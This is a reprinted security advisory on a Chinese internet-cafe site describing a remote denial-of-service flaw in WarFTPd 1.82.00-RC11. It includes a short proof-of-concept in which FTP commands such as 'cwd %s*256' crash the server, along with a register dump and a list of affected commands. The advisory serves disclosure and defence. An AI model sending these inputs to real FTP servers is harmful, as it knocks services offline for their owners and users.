天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

WarFTPd多个命令处理远程拒绝服务漏洞

2008-2-18龙翔阁红客基地佚名

【大中小】

　　受影响系统

　　Jgaa WarFTPd 1.82.00-RC11

　　描述

　　BUGTRAQ ID: 20944

　　War FTP Daemon是32位Windows平台上的FTP服务器。

　　WarFTPd在处理多个命令的畸形参数时存在漏洞，远程攻击者可能利用此漏洞对服务器造成拒绝服务。

　　如果向各种命令发送了包含有两次“%s”字符的超长字符串的话，就会导致WarFTPd拒绝服务。例如，发送以下命令：

$ ftp target
  (Banner)
  ftp> quote user anonymous
  ftp> quote pass bla
  ftp> cwd %s*256

或者：

ftp> cdup %s*256

就会导致服务器崩溃：

EAX 00000001
  ECX 00000073
  EDX 00000002
  EBX 0079E890
  ESP 0079E7A0
  EBP 00A55A8A
 ASCII
  "s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %s
  characters)" 
 ESI 0079E7DE
  EDI 0000000A
  EIP 00431540
 war-ftpd.00431540
    00431540
   8A08 
            MOV CL,BYTE PTR DS:[EAX]

　　目前已知至少以下命令受这个漏洞影响：

CWD  CDUP  DELE  NLST  LIST  SIZE

　　建议

　　厂商补丁：

　　Jgaa

　　目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

　　http://support.jgaa.com/index.php?MenuPage=frontpage

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理，安装维护:

本文来源：龙翔阁红客基地作者：佚名

上一篇文章：知己知彼　看看电脑病毒有哪些破坏方式

下一篇文章： Rama CMS Lang参数本地文件包含漏洞

在win7环境删除arp病毒的教程   教你在Win10环境压缩hiberfil.sys文件   教你破解win8系统rar格式压缩软件的密码
Surface Book 2笔记本无缘微软春季发布会：还没准备好   库克在中国参加会议：前面放着一台Surface  微软Surface Book 2外形设计将回归传统  起售价更低
Surface Book比拼Book One：微软和保时捷之间的终极较量   宁波Alienware网咖，已经不是“壕”能形容了   微软Office增加对MacBook Pro Touch Bar的支持
石家庄Alienware-v5网咖，专属游戏的世界

聚合推荐 ┊ 更多专题..

2022年网吧恢复营业时间网吧卫生网吧电脑配置开网吧网吧键盘网吧配置网吧GHOST ROS 网吧软件故障解决网众无盘网吧游戏菜单网吧活动网吧优化网吧精品网吧新手

声明

本文来源地址：0
声明：本站所发表的文章、评论及图片仅代表作者本人观点，与本站立场无关。若文章侵犯了您的相关权益，请及时与我们联系，我们会及时处理，感谢您对本站的支持！联系Email：support@txwb.com.，本站所有有注明来源为天下网吧或天下网吧论坛的原创作品，各位转载时请注明来源链接！

天下网吧·网吧天下